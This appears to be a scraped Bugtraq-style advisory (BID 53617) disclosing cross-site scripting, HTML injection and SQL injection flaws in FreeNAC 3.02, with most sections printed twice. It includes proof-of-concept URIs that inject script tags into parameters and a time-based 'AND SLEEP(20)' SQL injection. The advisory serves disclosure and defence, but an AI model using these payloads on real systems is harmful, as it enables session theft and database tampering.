FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities
BID:53617
Info
FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities
| Bugtraq ID: | 53617 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 19 2012 12:00AM |
| Updated: | May 19 2012 12:00AM |
| Credit: | Blake |
| Vulnerable: |
FreeNAC FreeNAC 3.02 |
| Not Vulnerable: | |
Discussion
FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities
FreeNAC is prone to multiple cross-site scripting vulnerabilities, an HTML injection vulnerability and an SQL injection vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FreeNAC 3.02 is vulnerable; other versions may be affected.
FreeNAC is prone to multiple cross-site scripting vulnerabilities, an HTML injection vulnerability and an SQL injection vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FreeNAC 3.02 is vulnerable; other versions may be affected.
Exploit / POC
FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities
An attacker can exploit these issues through a browser. An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues.
The following example URIs are available.
Cross-site scripting:
http://www.example.com/stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
HTML-injection:
http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1
SQL-Injection:
http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
An attacker can exploit these issues through a browser. An attacker must trick an unsuspecting victim into following a malicious URI to exploit the cross-site scripting issues.
The following example URIs are available.
Cross-site scripting:
http://www.example.com/stats.php?graphtype=bar&type=vlan13<script>alert(1)</script> HTTP/1.1
HTML-injection:
http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1&vlan=6&username=2&office=1&comment="><script>alert(2)</script>&action=Update&action_idx=1
SQL-Injection:
http://www.example.com/deviceadd.php?name=test&mac=0001.0001.0001&status=1+AND+SLEEP(20)&vlan=6&username=2&office=1&comment=&action=Update&action_idx=1
Solution / Fix
FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
FreeNAC Multiple Cross Site Scripting, HTML Injection and SQL Injection Vulnerabilities
References:
References:
- FreeNAC Homepage (FreeNAC)